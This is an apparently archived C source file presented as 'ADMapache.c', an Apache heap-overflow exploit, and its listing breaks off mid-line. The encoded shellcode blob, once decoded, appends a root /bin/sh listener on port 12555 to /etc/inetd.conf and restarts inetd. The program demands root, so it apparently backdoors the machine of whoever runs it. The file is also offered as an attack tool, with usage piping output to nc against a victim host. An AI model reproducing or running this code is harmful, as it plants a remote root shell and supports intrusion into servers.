home *** CD-ROM | disk | FTP | other *** search
- /*
- * ADM CONFIDENTIAL -- (ADM Confidential Restricted when *
- * combined with the aggregated modules for this product) *
- * OBJECT CODE ONLY SOURCE MATERIALS *
- * (C) COPYRIGHT ADM Crew. 2000 *
- * ALL RIGHTS RESERVED *
- * *
- * This module may not be used, published, distributed, or *
- * archived without the written permission of the ADM Crew. *
- * *
- * *
- * Title: ADMapache.c (ADM Linux Apache.c (x86)) *
- * Tested: Redhat Apache 1.3.9, Slack Apache 1.3.12 *
- * Author: plaguez *
- * Synopsis: *
- * Apache has gone to great lengths to prevent *
- * the stack from being smashed, but for some *
- * odd reason, checking for the BBS segment of *
- * memory being "redirected" had been neglected *
- * to be checked. The problem lies within the *
- * POST directive processer in the apache module *
- * controler. *
- * *
- * Usage: *
- * compile with "gcc -o ADMapache ADMapache.c *
- * "./ADMapache <offset> | nc targethost 80" *
- * offset between 423-443 should work. *
- * *
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <string.h>
- #include <sys/types.h>
-
- #define ERROR -1
- #define BUFSIZE 5096
- #define offset "326"
- #define r00t "0"
-
- unsigned char shellcode[] =
- "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x1c\x01"
- "\x80\x36\x03\x46\xe2\xfa\xe8\x58\x2c\x61\x6a\x6d\x2c\x68\x6a\x6f\x6f\x62\x6f"
- "\x6f\x03\x2e\x4b\x56\x53\x03\x6a\x6d\x66\x77\x67\x03\x8e\xb5\x03\x03\x03\x03"
- "\x32\x37\x36\x36\x36\x23\x70\x77\x71\x66\x62\x6e\x23\x77\x60\x73\x23\x6d\x6c"
- "\x74\x62\x6a\x77\x23\x71\x6c\x6c\x77\x23\x2c\x61\x6a\x6d\x2c\x70\x6b\x23\x2c"
- "\x61\x6a\x6d\x2c\x70\x6b\x03\x2c\x66\x77\x60\x2c\x6a\x6d\x66\x77\x67\x2d\x60"
- "\x6c\x6d\x65\x03\x82\xef\x64\x28\x03\x03\x93\x56\x8a\xe6\x80\xef\x1f\x54\x55"
- "\x50\xeb\x03\x03\x03\x03\x58\x82\xc0\x1d\x12\x03\x03\x8e\x80\x71\xed\xfc\xfc"
- "\x8a\x46\xef\x8a\x46\xf3\x8e\x90\x7c\xed\xfc\xfc\x8a\x56\xf7\x8e\x88\x87\xed"
- "\xfc\xfc\x8a\x4e\xfb\xc4\x46\xff\x03\x03\x03\x03\x8e\xb0\x93\xed\xfc\xfc\x8a"
- "\x76\xeb\x8e\xb8\xbe\xed\xfc\xfc\xbb\x06\x03\x03\x03\x8a\xfd\xba\x01\x07\x03"
- "\x03\xb9\xee\x02\x03\x03\x50\x8a\xf0\xce\x83\x8a\xc4\xbb\x2a\x03\x03\x03\x8a"
- "\xfd\x50\x8a\xf0\xce\x83\x8a\x46\xe7\xbb\x07\x03\x03\x03\x88\x76\xe7\x88\x4e"
- "\xeb\xb9\x2f\x03\x03\x03\x50\x8a\xf0\xce\x83\xbb\x05\x03\x03\x03\x50\x8a\xf0"
- "\xce\x83\xbb\x05\x03\x03\x03\x8a\xfd\x50\x8a\xf0\xce\x83\x8e\x7e\xf3\xbb\x08"
- "\x03\x03\x03\x88\x76\xef\x8a\xfa\x32\xd1\x50\x8a\xf0\xce\x83\x8e\x66\xdb\x58"
- "\x5d\x5c\xca\xc0\x93";
-
- u_long getesp()
- {
- __asm__("movl %esp,%eax"); /* set sp as ret.addr for reference */
- }
-
- int main(int argc, char **argv)
- {
- register int i;
- u_long sysaddr;
- int (*q)();
- int *uid;
- char buf[BUFSIZE + sizeof(u_long) + 1];
-
-
- if (getuid() != 0) {
- puts("[Apache heap overflow by plaguez, ADM Crew]");
- puts("root is neccesary so we can access higher memory addresses.");
- exit(0); }
-
- if(argc <= 1)
- {
- fprintf(stderr,"[Apache heap overflow by plaguez, ADM Crew]\n");
- fprintf(stderr,"Usage: %s <offset> | nc <victim> 80\n",argv[0]);
- return(ERROR);
- }
- sysaddr = getesp() + atoi(argv[1]);
- memset(buf, 'A', BUFSIZE + sizeof(u_long)); /* gotta love those x41's */
- q = shellcode;
- /* reverse byte order */
- for(i = 0; i < sizeof(sysaddr); i++)
- buf[B
-
